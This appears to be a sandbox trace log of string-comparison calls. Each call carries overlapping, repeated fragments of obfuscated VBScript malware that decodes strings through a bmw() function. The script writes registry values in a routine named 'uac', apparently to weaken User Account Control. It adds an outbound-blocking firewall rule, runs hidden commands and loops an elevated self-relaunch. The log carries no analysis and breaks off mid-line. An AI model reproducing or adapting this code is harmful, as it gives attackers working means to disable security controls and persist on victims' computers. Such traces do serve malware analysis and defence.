bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 67 [0226.381] wcsncmp (_String1="\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 71 [0226.381] wcsncmp (_String1="\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.381] wcsncmp (_String1="newRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.381] wcsncmp (_String1="ewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.381] wcsncmp (_String1="wRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), 